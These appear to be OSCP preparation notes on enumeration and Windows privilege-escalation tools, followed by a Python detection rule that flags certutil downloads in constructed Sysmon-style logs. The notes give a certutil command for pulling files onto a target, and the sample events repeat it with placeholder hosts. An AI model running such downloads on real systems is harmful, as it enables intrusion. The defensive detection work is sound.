Aaron Goldstein

Interview is here.
  • - Great site for tracking progress against machines (can import nmap data for tracking too). I use this all the time for the Venom builder (shell creation) and other cool stuff. The free version works great.
  • AutoRecon is the tool I used for automating the enumeration process (and OSCP exam approved). I also used a LOLBIN (Living off the Land Binary) to download files from the Windows box - the command was "Certutil -urlcache -split -f <link to file to download>". These are great because most systems will already have them installed.
  • Here is a great site that outlines TONS of them.
  • A few links / tools that helped me with Windows Privesc: List of pre-compiled binaries for different exploits -
  • WATSON - tool for identifying exploits for Windows privesc - requires .NET - runs on target host. Quick method to check what version of .NET is installed on the host (needed for Watson): reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP"
  • Windows Exploit Suggester - This is a great tool for finding exploits on Windows hosts for privesc too - but this one takes in the "systeminfo" from the target host and runs locally on the attacker system
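The certutil command in the notes above is exactly the kind of LOLBin activity a blue team watches for: the binary is legitimate, so the signal is in the command line, not the image. The following is an added example (not code from the post) in Python that runs one detection rule over constructed Sysmon-style process-creation records. The field names mirror Sysmon Event ID 1 (Image, CommandLine, ParentImage, User, OriginalFileName), but every record, host name, user and URL is made up for this example. It is slightly more general than the note's single command: it accepts either "-" or "/" as the flag prefix and ignores case, both of which certutil itself accepts, and it does not fire on a bare "-urlcache" (cache listing) with no remote URL.

```python
"""Flag certutil-based file downloads in process-creation telemetry.

Added example for these notes. Records are constructed in the shape of Sysmon
Event ID 1 fields; nothing here is real telemetry.
"""
import ntpath
import re
from typing import Dict, Iterable, List, Optional

# Constructed sample events (not real logs). 192.0.2.0/24 is a documentation range.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {   # the exact pattern from the notes: fetch a remote file to disk
        "Image": r"C:\Windows\System32\certutil.exe",
        "OriginalFileName": "CertUtil.exe",
        "CommandLine": r"certutil -urlcache -split -f http://192.0.2.10/tool.exe C:\Users\Public\tool.exe",
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "User": "LAB\\jdoe",
    },
    {   # benign admin use: hashing a file, no network access
        "Image": r"C:\Windows\System32\certutil.exe",
        "OriginalFileName": "CertUtil.exe",
        "CommandLine": r"certutil -hashfile C:\Temp\installer.msi SHA256",
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "User": "LAB\\jdoe",
    },
    {   # same download behaviour with "/" flags and mixed case, spawned from PowerShell
        "Image": r"C:\Windows\System32\certutil.exe",
        "OriginalFileName": "CertUtil.exe",
        "CommandLine": r"CERTUTIL.EXE /URLCACHE /F https://192.0.2.10/payload.txt payload.txt",
        "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "User": "LAB\\svc-web",
    },
    {   # "-urlcache" with no URL only lists the local cache: not a download
        "Image": r"C:\Windows\System32\certutil.exe",
        "OriginalFileName": "CertUtil.exe",
        "CommandLine": r"certutil -urlcache",
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "User": "LAB\\jdoe",
    },
    {   # unrelated process that happens to carry a URL
        "Image": r"C:\Program Files\Git\cmd\git.exe",
        "OriginalFileName": "git.exe",
        "CommandLine": r"git clone https://192.0.2.20/repo.git",
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "User": "LAB\\jdoe",
    },
]

# certutil accepts "-" or "/" before a verb and is case-insensitive.
URLCACHE_FLAG = re.compile(r"(?:^|\s)[-/]urlcache\b", re.IGNORECASE)
# A remote source argument; the download variant always carries one.
URL_ARG = re.compile(r"\b(?:https?|ftp)://\S+", re.IGNORECASE)


def is_certutil(event: Dict[str, str]) -> bool:
    """Match on the PE's original file name when present, so a renamed copy is
    still recognised; fall back to the on-disk image name."""
    name = event.get("OriginalFileName") or ntpath.basename(event.get("Image", ""))
    return name.lower() == "certutil.exe"


def classify(event: Dict[str, str]) -> Optional[Dict[str, str]]:
    """Return an alert dict for a certutil download, or None for anything else."""
    if not is_certutil(event):
        return None
    cmd = event.get("CommandLine", "")
    if not URLCACHE_FLAG.search(cmd):
        return None
    url = URL_ARG.search(cmd)
    if url is None:
        return None  # bare -urlcache: cache listing/clear, no remote fetch
    return {
        "rule": "certutil_urlcache_download",
        "url": url.group(0),
        "user": event.get("User", ""),
        "parent": ntpath.basename(event.get("ParentImage", "")),
    }


def scan(events: Iterable[Dict[str, str]]) -> List[Dict[str, str]]:
    """Run the rule over a stream of process-creation events and collect hits."""
    return [hit for hit in (classify(e) for e in events) if hit is not None]


if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS):
        print(f"[{hit['rule']}] user={hit['user']} parent={hit['parent']} url={hit['url']}")
```

Run against the constructed events, the rule fires twice (the cmd.exe and the PowerShell-spawned downloads) and stays quiet on the hash check, the bare cache listing and the git clone. In practice the ParentImage and User fields are what turn a hit into a prioritised alert: certutil fetching a remote file under a service account, or from a shell spawned by a web server process, deserves a faster response than the same command from a known admin workstation.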
Key takeaways: